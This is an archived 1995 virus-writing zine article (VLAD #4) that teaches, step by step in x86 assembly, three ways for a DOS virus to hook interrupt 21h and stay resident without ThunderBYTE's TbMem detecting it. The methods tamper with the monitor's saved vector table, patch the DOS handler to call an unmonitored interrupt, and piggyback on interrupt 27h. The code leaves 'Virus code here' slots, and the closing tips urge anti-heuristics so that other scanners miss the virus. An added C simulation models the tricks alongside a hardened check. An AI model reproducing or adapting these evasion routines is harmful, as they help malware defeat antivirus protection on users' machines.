VLAD #4, ARTICLE.2_6 (text file dated 1995-04-25, from the Cuteskunk BBS archive)
T B M E M F L A W S
Written by
Darkman/VLAD
────────────
Introduction
────────────
This document gives further examples of how a program can make itself
resident in memory without being detected by TbMem, the memory-resident part
of ThunderBYTE Anti-Virus. It also lists which interrupts TbMem hooks and
which interrupts TbMem monitors. All examples in this document hook
interrupt 21h.
────────────────────────────
Thunderbyte B.V. about TbMem
────────────────────────────
Controlling memory: TbMem
TbMem detects attempts from programs to remain resident in memory, and
ensures that no program can remain resident in memory without permission.
Since most viruses remain resident in memory, this is a powerful weapon
against all such viruses, known or unknown. Permission information is
maintained in the Anti-Vir.Dat files. TbMem also protects your CMOS memory
against unwanted modifications.
──────────────────────────
Interrupts hooked by TbMem
──────────────────────────
These interrupts are hooked by TbMem; the bracketed value is the offset of
the handler within TbMem's own segment (TbSeg), so the segment part of one
of these vectors gives TbSeg:
INT 09h (IRQ 1 Keyboard) [TBSeg:0269]
INT 2Fh (Software Multiplex) [TBSeg:00DB]
─────────────────────────────
Interrupts monitored by TbMem
─────────────────────────────
These interrupts are monitored by TbMem: it keeps a saved copy of each
vector at the bracketed offset within its own segment and compares the live
vectors against those copies when a program tries to stay resident:
INT 08h (IRQ 0 System timer) [TBSeg:0060]
INT 09h (IRQ 1 Keyboard) [TBSeg:0064]
INT 10h (BIOS System Video Services) [TBSeg:0068]
INT 13h (BIOS Fixed disk/FDD Services) [TBSeg:004C]
INT 15h (BIOS System Services) [TBSeg:0088]
INT 16h (BIOS Keyboard Services) [TBSeg:006C]
INT 17h (BIOS Printer Services (LPT)) [TBSeg:007C]
INT 1Ah (BIOS Real-Time Clock Services) [TBSeg:0074]
INT 1Ch (BIOS User Timer Tick) [TBSeg:005C]
INT 20h (DOS Program Terminate) [TBSeg:0050]
INT 21h (DOS Function call) [TBSeg:0054]
INT 26h (DOS Absolute Disk Write) [TBSeg:0090]
INT 28h (DOS Idle) [TBSeg:0070]
INT 29h (DOS Fast Console Output) [TBSeg:0078]
INT 2Ah (Local Area Network) [TBSeg:0098]
INT 2Fh (Software Multiplex) [TBSeg:0058]
INT 40h (BIOS Diskette Service) [TBSeg:008C]
INT 50h (BIOS Reserved) [TBSeg:0094]
INT 70h (IRQ 8 AT Real Time Clock) [TBSeg:0080]
INT 76h (IRQ 14 AT Fixed Disk) [TBSeg:0084]
TbMem will also warn the user if INT 27h (DOS Terminate and Stay Res.) or
INT 21h, function 31h (DOS Function call, Terminate but stay resident) is
called.
──────────────────────
How to trick TbMem 1/3
──────────────────────
The first method needs the following two pieces of code:
1. Hook interrupt 21h.
2. Modify TbMem's interrupt vector table.
──────────────────
Hook interrupt 21h
──────────────────
The below code shows an example of how to hook interrupt 21h. It assumes
ES = CS, as in a .COM program at entry, and that int21adr is the doubleword
stored in front of the far jump in the interrupt 21h handler (shown in the
third method below):
;------------------------------------------------------------=< cut here >=---
                push    ds                      ; Save DS at stack
                xor     ax,ax                   ; Clear AX
                mov     ds,ax                   ; DS = segment of interrupt table
                cld                             ; MOVSW must count upwards
                lea     di,int21adr             ; ES:DI = int21adr (ES = CS)
                mov     si,(21h*04h)            ; DS:SI = vector of interrupt 21h
                movsw                           ; Store address of interrupt 21h \
                movsw                           ; in int21adr                     /
                mov     word ptr ds:[21h*04h],offset int21handler
                mov     ds:[21h*04h+02h],es     ; Intercept interrupt 21h
                pop     ds                      ; Load DS from stack
;------------------------------------------------------------=< cut here >=---
─────────────────────────────────────
Modify TbMem's interrupt vector table
─────────────────────────────────────
The below code shows an example of how to modify TbMem's interrupt vector
table. TbMem hooks interrupt 09h, so the segment of that vector is TbMem's
segment (TbSeg), and offset 0054h in it holds TbMem's saved copy of the
interrupt 21h vector (see the table above; the offsets are those of the
version tested, see the final tips). Writing the new handler address there
makes the saved copy agree with the live vector, so TbMem sees no change:
;------------------------------------------------------------=< cut here >=---
                push    ds                      ; Save DS at stack
                xor     ax,ax                   ; Clear AX
                mov     ds,ax                   ; DS = segment of interrupt vectors
                mov     ds,ds:[09h*04h+02h]     ; DS = segment of TbMem (via its INT 09h hook)
                mov     word ptr ds:[0054h],offset int21handler
                mov     ds:[0056h],es           ; Modify the segment of interrupt 21h (ES = CS)
                pop     ds                      ; Load DS from stack
;------------------------------------------------------------=< cut here >=---
──────────────────────
How to trick TbMem 2/3
──────────────────────
The second method needs the following four pieces of code:
1. Installation check.
2. Hook interrupt 60h.
3. Modify TbDriver's interrupt 21h.
4. Interrupt 60h handler.
──────────────────
Installation check
──────────────────
The below code shows an example of how to check whether the trick has already
been installed. The interrupt 60h handler below answers AX = 63FFh by copying
AX into BX; BX is cleared first so that a stale value cannot produce a false
match:
;------------------------------------------------------------=< cut here >=---
                mov     ax,63ffh                ; Interrupt 21h service
                xor     bx,bx                   ; BX must differ from AX beforehand
                int     21h                     ; Do it!
                cmp     ax,bx                   ; Already resident?
                je      trickexit               ; Equal? Jump to trickexit
                ; Trick TbMem here...
trickexit:
;------------------------------------------------------------=< cut here >=---
──────────────────
Hook interrupt 60h
──────────────────
The below code shows an example of how to hook interrupt 60h. Interrupt 60h
is not in TbMem's monitored list, so changing its vector raises no warning.
ES = CS is assumed, as in a .COM program at entry:
;------------------------------------------------------------=< cut here >=---
                push    ds                      ; Save DS at stack
                xor     ax,ax                   ; Clear AX
                mov     ds,ax                   ; DS = segment of interrupt table
                mov     word ptr ds:[60h*04h],offset int60handler
                mov     ds:[60h*04h+02h],es     ; Intercept interrupt 60h (ES = CS)
                pop     ds                      ; Load DS from stack
;------------------------------------------------------------=< cut here >=---
───────────────────────────────
Modify TbDriver's interrupt 21h
───────────────────────────────
The below code shows an example of how to modify TbDriver's interrupt 21h
handler in place. The vector itself is left untouched; instead the first two
bytes of the handler are replaced with an INT 60h instruction (opcode CDh 60h),
so every interrupt 21h call first enters the interrupt 60h handler. The two
overwritten bytes are lost: the interrupt 60h handler returns to the byte
after them, so it has to do whatever those bytes did, or the patched handler
is corrupted:
;------------------------------------------------------------=< cut here >=---
                push    ds                      ; Save DS at stack
                xor     ax,ax                   ; Clear AX
                mov     ds,ax                   ; DS = segment of interrupt vectors
                lds     si,ds:[21h*04h]         ; DS:SI = address of interrupt 21h handler
                mov     word ptr [si],060cdh    ; Write an INT 60h instruction (CDh 60h)
                pop     ds                      ; Load DS from stack
;------------------------------------------------------------=< cut here >=---
─────────────────────
Interrupt 60h handler
─────────────────────
The below code shows an example of an interrupt 60h handler. It is entered
from the INT 60h written into TbDriver's interrupt 21h handler, so after its
IRET execution continues inside that handler, two bytes past its entry point:
;------------------------------------------------------------=< cut here >=---
int60handler    proc    near                    ; Interrupt 60h handler
                cmp     ax,63ffh                ; Interrupt 60h service?
                je      int60servi              ; Equal? Jump to int60servi
                ; Virus code here...
                ; Re-do here what the two overwritten bytes of the
                ; interrupt 21h handler did, since IRET returns past them
                iret                            ; Interrupt return!
int60servi:
                mov     bx,ax                   ; BX = AX marks the trick as installed
                iret                            ; Interrupt return!
int60handler    endp
;------------------------------------------------------------=< cut here >=---
──────────────────────
How to trick TbMem 3/3
──────────────────────
The third method needs the following four pieces of code:
1. Installation check.
2. Hook interrupt 27h.
3. Interrupt 27h handler.
4. Interrupt 21h handler.
──────────────────
Installation check
──────────────────
The below code shows an example of how to check whether the trick has already
been installed. The first two bytes of int27handler are PUSH AX (50h) and
PUSH BX (53h), which read as the word 5350h:
;------------------------------------------------------------=< cut here >=---
                push    ds                      ; Save DS at stack
                xor     ax,ax                   ; Clear AX
                mov     ds,ax                   ; DS = segment of interrupt vectors
                lds     si,ds:[27h*04h]         ; DS:SI = address of interrupt 27h handler
                cmp     word ptr [si],5350h     ; Interrupt 27h hooked? (push ax / push bx)
                pop     ds                      ; Load DS from stack (flags unchanged)
                je      trickexit               ; Already hooked? Jump to trickexit
                ; Trick TbMem here...
trickexit:
;------------------------------------------------------------=< cut here >=---
──────────────────
Hook interrupt 27h
──────────────────
The below code shows an example of how to hook interrupt 27h. Interrupt 27h
is not in TbMem's monitored list, although TbMem warns when it is called;
the handler below passes every call on to the original handler. ES = CS is
assumed, as in a .COM program at entry:
;------------------------------------------------------------=< cut here >=---
                push    ds                      ; Save DS at stack
                xor     ax,ax                   ; Clear AX
                mov     ds,ax                   ; DS = segment of interrupt table
                cld                             ; MOVSW must count upwards
                lea     di,int27adr             ; ES:DI = int27adr (ES = CS)
                mov     si,(27h*04h)            ; DS:SI = vector of interrupt 27h
                movsw                           ; Store address of interrupt 27h \
                movsw                           ; in int27adr                     /
                mov     word ptr ds:[27h*04h],offset int27handler
                mov     ds:[27h*04h+02h],es     ; Intercept interrupt 27h
                pop     ds                      ; Load DS from stack
;------------------------------------------------------------=< cut here >=---
─────────────────────
Interrupt 27h handler
─────────────────────
The below code shows an example of an interrupt 27h handler. It runs whenever
any program terminates and stays resident through interrupt 27h: if the
interrupt 21h hook is not yet in place it installs it at that moment and then
passes the call on to the original interrupt 27h handler, so the vector
change first becomes visible while that other program is going resident.
int21adr and int21handler are defined in the interrupt 21h handler below:
;------------------------------------------------------------=< cut here >=---
int27handler    proc    near                    ; Interrupt 27h handler
                push    ax                      ; Save AX at stack (opcode 50h)
                push    bx                      ; Save BX at stack (opcode 53h)
                mov     ax,63feh                ; Interrupt 21h service
                xor     bx,bx                   ; BX must differ from AX beforehand
                int     21h                     ; Do it!
                cmp     ax,bx                   ; Already resident?
                je      int27exit               ; Equal? Jump to int27exit
                push    di                      ; Save DI at stack
                push    si                      ; Save SI at stack
                push    ds                      ; Save DS at stack
                push    es                      ; Save ES at stack
                xor     ax,ax                   ; Clear AX
                mov     ds,ax                   ; DS = segment of interrupt table
                push    cs                      ; Save CS at stack
                pop     es                      ; ES = CS, destination for MOVSW
                cld                             ; MOVSW must count upwards
                lea     di,int21adr             ; ES:DI = int21adr
                mov     si,(21h*04h)            ; DS:SI = vector of interrupt 21h
                movsw                           ; Store address of interrupt 21h \
                movsw                           ; in int21adr                     /
                mov     word ptr ds:[21h*04h],offset int21handler
                mov     ds:[21h*04h+02h],cs     ; Intercept interrupt 21h
                pop     es                      ; Load ES from stack
                pop     ds                      ; Load DS from stack
                pop     si                      ; Load SI from stack
                pop     di                      ; Load DI from stack
int27exit:
                pop     bx                      ; Load BX from stack
                pop     ax                      ; Load AX from stack
                db      0eah                    ; Object code of JMP FAR: jump to the
int27adr        dd      ?                       ; original interrupt 27h handler
int27handler    endp
;------------------------------------------------------------=< cut here >=---
─────────────────────
Interrupt 21h handler
─────────────────────
The below code shows an example of an interrupt 21h handler. Calls other than
the installation-check service are passed on with a far jump whose target
operand, int21adr, is stored inline right after the 0EAh opcode; the hook
code fills it in with the original vector:
;------------------------------------------------------------=< cut here >=---
int21handler    proc    near                    ; Interrupt 21h handler
                cmp     ax,63feh                ; Interrupt 21h service?
                je      int21servi              ; Equal? Jump to int21servi
                ; Virus code here...
                db      0eah                    ; Object code of JMP FAR: jump to the
int21adr        dd      ?                       ; original interrupt 21h handler
int21servi:
                mov     bx,ax                   ; BX = AX marks the trick as installed
                iret                            ; Interrupt return!
int21handler    endp
;------------------------------------------------------------=< cut here >=---
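To see what each trick changes from the defender's side, here is an added model in C; it is not TbMem's code and not part of the original article. It simulates a real-mode interrupt vector table and a monitor that, as TbMem is described above, keeps a saved copy of every monitored vector at the listed offsets in its own segment (TbSeg) and can be located through its interrupt 09h hook. The three attacks modelled are a plain INT 21h hook, trick 1 (overwriting the saved copy at TbSeg:0054) and trick 2 (hooking the unmonitored INT 60h and patching the first two bytes of the INT 21h handler). The segment values, the stub handlers and the eight-byte entry fingerprint used by the hardened check are assumptions of the model, not TbMem's behaviour. Trick 3 is a matter of timing (the hook goes in while some other program is terminating through INT 27h) and is represented only by the permission flag passed to tsr_warns.

```c
/* Added model, not TbMem's code: a real-mode IVT, a TbMem-style monitor with a saved-vector table in its own
 * segment, the article's INT 21h hooking tricks, and a hardened check. Segments and handler bytes are constructed. */
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

typedef struct { uint16_t off, seg; } farptr_t;
static uint8_t mem[0x100000];   /* 1 MiB of simulated real-mode memory */

static uint32_t lin(uint16_t seg, uint16_t off) { return ((uint32_t)seg << 4) + off; }
static uint16_t rd16(uint32_t a) { return (uint16_t)(mem[a] | (mem[a + 1] << 8)); }
static void wr16(uint32_t a, uint16_t v) { mem[a] = (uint8_t)v; mem[a + 1] = (uint8_t)(v >> 8); }
static farptr_t ivt_get(uint8_t n) { farptr_t p = { rd16(n * 4u), rd16(n * 4u + 2) }; return p; }
static void ivt_set(uint8_t n, uint16_t seg, uint16_t off) { wr16(n * 4u, off); wr16(n * 4u + 2, seg); }

/* Vectors TbMem monitors and the offset of each saved copy in TbSeg, taken from the table above */
static const struct { uint8_t vec; uint16_t off; } watched[] = {
    {0x08,0x0060},{0x09,0x0064},{0x10,0x0068},{0x13,0x004C},{0x15,0x0088},{0x16,0x006C},{0x17,0x007C},
    {0x1A,0x0074},{0x1C,0x005C},{0x20,0x0050},{0x21,0x0054},{0x26,0x0090},{0x28,0x0070},{0x29,0x0078},
    {0x2A,0x0098},{0x2F,0x0058},{0x40,0x008C},{0x50,0x0094},{0x70,0x0080},{0x76,0x0084},
};
#define NWATCHED (sizeof watched / sizeof watched[0])
#define TBSEG  0x1000   /* assumed: segment the monitor occupies */
#define DOSSEG 0x0200   /* assumed: segment of the original handlers */
#define VIRSEG 0x3000   /* assumed: segment of the intruder */
#define PROLOGUE 8      /* handler entry bytes fingerprinted by the hardened check (model only) */
static uint8_t prologue[NWATCHED][PROLOGUE]; /* held outside simulated memory: not reachable via the INT 09h vector */

/* Fresh machine: each vector points at its own constructed stub handler (sti; iret) in DOSSEG. */
static void reset_machine(void) {
    memset(mem, 0, sizeof mem);
    for (unsigned v = 0; v < 256; v++) {
        uint16_t off = (uint16_t)(0x0100 + v * 0x10);
        mem[lin(DOSSEG, off)] = 0xFB; mem[lin(DOSSEG, off + 1)] = 0xCF;   /* sti; iret */
        ivt_set((uint8_t)v, DOSSEG, off);
    }
}

/* Monitor install: hook INT 09h and INT 2Fh at the offsets listed above, then save every watched vector. */
static void monitor_install(void) {
    ivt_set(0x09, TBSEG, 0x0269);
    ivt_set(0x2F, TBSEG, 0x00DB);
    for (size_t i = 0; i < NWATCHED; i++) {
        farptr_t p = ivt_get(watched[i].vec);
        wr16(lin(TBSEG, watched[i].off), p.off);
        wr16(lin(TBSEG, watched[i].off + 2), p.seg);
        memcpy(prologue[i], &mem[lin(p.seg, p.off)], PROLOGUE);
    }
}

/* Vector check, the one the tricks aim at: live IVT against the saved table. First changed vector, or -1. */
static int check_vectors(void) {
    for (size_t i = 0; i < NWATCHED; i++) {
        farptr_t live = ivt_get(watched[i].vec);
        uint32_t saved = lin(TBSEG, watched[i].off);
        if (live.off != rd16(saved) || live.seg != rd16(saved + 2)) return watched[i].vec;
    }
    return -1;
}

/* Hardened check: follow the live vector and compare the handler's entry bytes with the fingerprint. */
static int check_prologues(void) {
    for (size_t i = 0; i < NWATCHED; i++) {
        farptr_t live = ivt_get(watched[i].vec);
        if (memcmp(prologue[i], &mem[lin(live.seg, live.off)], PROLOGUE) != 0) return watched[i].vec;
    }
    return -1;
}

/* TSR-time decision as the article describes it: a changed watched vector plus no permission gives a warning. */
static bool tsr_warns(bool program_permitted) { return check_vectors() >= 0 && !program_permitted; }

/* Naive resident program: just points INT 21h at itself. */
static void hook_plain(void) { ivt_set(0x21, VIRSEG, 0x0100); }

/* Trick 1: hook INT 21h and overwrite the saved copy at TbSeg:0054, finding TbSeg through the INT 09h hook. */
static void trick1(void) {
    uint16_t tbseg = ivt_get(0x09).seg;
    ivt_set(0x21, VIRSEG, 0x0100);
    wr16(lin(tbseg, 0x0054), 0x0100);
    wr16(lin(tbseg, 0x0056), VIRSEG);
}

/* Trick 2: leave the INT 21h vector alone; hook unwatched INT 60h and patch the handler's first two bytes to CD 60. */
static void trick2(void) {
    farptr_t h = ivt_get(0x21);
    ivt_set(0x60, VIRSEG, 0x0200);
    wr16(lin(h.seg, h.off), 0x60CD);   /* little-endian: CDh 60h = INT 60h */
}

int main(void) {
    void (*attack[])(void) = { hook_plain, trick1, trick2 };
    const char *name[] = { "plain hook", "trick 1", "trick 2" };
    for (int i = 0; i < 3; i++) {
        reset_machine(); monitor_install(); attack[i]();
        printf("%-10s vector check: %-8s prologue check: %s\n", name[i],
               check_vectors() < 0 ? "clean" : "changed", check_prologues() < 0 ? "clean" : "changed");
    }
    return 0;
}
```

A saved-vector table is only as strong as its secrecy and its integrity: trick 1 works because the INT 09h hook reveals TbSeg and the table is writable, and trick 2 works because the check compares pointers rather than the code they point at. The prologue check catches both in the model, but on a real machine the fingerprint lives in RAM as well, so it raises the bar rather than closing the gap.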
─────────────────────
Final tips and tricks
─────────────────────
- Detect TbMem before using these tricks.
- These examples were tested with ThunderBYTE Anti-Virus v 6.32.
- Use plenty of anti-heuristics, so other programs can't find the virus either.
- See also Catch-22 by Rhincewind/VLAD.